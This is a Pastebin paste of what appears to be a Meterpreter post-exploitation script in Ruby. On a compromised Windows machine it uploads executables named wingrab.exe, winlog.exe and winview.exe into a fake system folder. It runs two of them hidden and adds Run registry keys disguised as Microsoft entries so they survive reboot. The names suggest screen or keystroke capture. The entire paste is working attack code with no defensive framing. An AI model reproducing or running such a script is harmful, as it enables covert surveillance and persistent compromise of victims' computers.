Guest User

Untitled

a guest
Jun 23rd, 2018
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.73 KB | None | 0 0
  1. if(not client.sys.process["wingrab.exe"])
  2. if(not client.sys.process["winlog.exe"])
  3.  
  4. if(not client.fs.dir.entries("c:\\system"))
  5. print_status("Creating directory")
  6. client.fs.dir.mkdir("c:\\system")
  7. client.fs.dir.mkdir("c:\\system\\windows")
  8. client.fs.file.upload_file("c:\\system\\windows\\wingrab.exe" , "/root/Desktop/exploits/Project/wingrab.exe")
  9. client.fs.file.upload_file("c:\\system\\windows\\winlog.exe" , "/root/Desktop/exploits/Project/winlog.exe")
  10. client.fs.file.upload_file("c:\\system\\windows\\winview.exe" , "/root/Desktop/exploits/Project/winview.exe")
  11.  
  12.  
  13. client.sys.process.execute("c:\\system\\windows\\wingrab.exe", nil, {'Hidden' => 'true'})
  14. client.sys.process.execute("c:\\system\\windows\\winlog.exe", nil, {'Hidden' => 'true'})
  15.  
  16. key = "HKLM\\software\\microsoft\\windows\\currentversion\\run"
  17. value = "MicrosoftETA"
  18. data = "c:\\system\\windows\\wingrab.exe"
  19. type = "REG_SZ"
  20. root_key, base_key = client.sys.registry.splitkey(key)
  21. open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  22. open_key.set_value(value, client.sys.registry.type2str(type), data)
  23. print_line("Successful")
  24.  
  25. key = "HKLM\\software\\microsoft\\windows\\currentversion\\run"
  26. value = "MicrosoftETI"
  27. data = "c:\\system\\windows\\winlog.exe"
  28. type = "REG_SZ"
  29. root_key, base_key = client.sys.registry.splitkey(key)
  30. open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  31. open_key.set_value(value, client.sys.registry.type2str(type), data)
  32. print_line("Successful")
  33. else
  34. print("Directory already created....")
  35. client.sys.process.execute("c:\\system\\windows\\wingrab.exe", nil, {'Hidden' => 'true'})
  36. client.sys.process.execute("c:\\system\\windows\\winlog.exe", nil, {'Hidden' => 'true'})
  37. end
  38.  
  39. print("test")
  40.  
  41. end
  42. end
Add Comment
Please, Sign In to add comment